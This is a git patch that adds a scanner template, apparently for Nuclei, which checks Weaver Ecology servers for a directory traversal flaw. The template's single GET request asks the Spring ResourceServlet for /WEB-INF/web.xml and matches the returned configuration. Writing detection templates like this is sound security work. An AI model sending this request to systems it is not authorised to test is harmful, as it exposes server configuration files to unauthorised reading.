From 71e25fa42d2d36ddbead4ee4578f46924f9b0c36 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Fri, 23 Apr 2021 18:52:08 +0530
Subject: [PATCH] Create ecology-springframework-directory-traversal.yaml

---
 ...y-springframework-directory-traversal.yaml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 vulnerabilities/other/ecology-springframework-directory-traversal.yaml

diff --git a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml b/vulnerabilities/other/ecology-springframework-directory-traversal.yaml
new file mode 100644
index 0000000000..54317204ee
--- /dev/null
+++ b/vulnerabilities/other/ecology-springframework-directory-traversal.yaml
@@ -0,0 +1,20 @@
+id: ecology-springframework-directory-traversal
+info:
+  name: Ecology Springframework Directory Traversal
+  author: princechaddha
+  severity: medium
+  tags: ecology,springframework,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<url-pattern>/weaver/"
+        part: body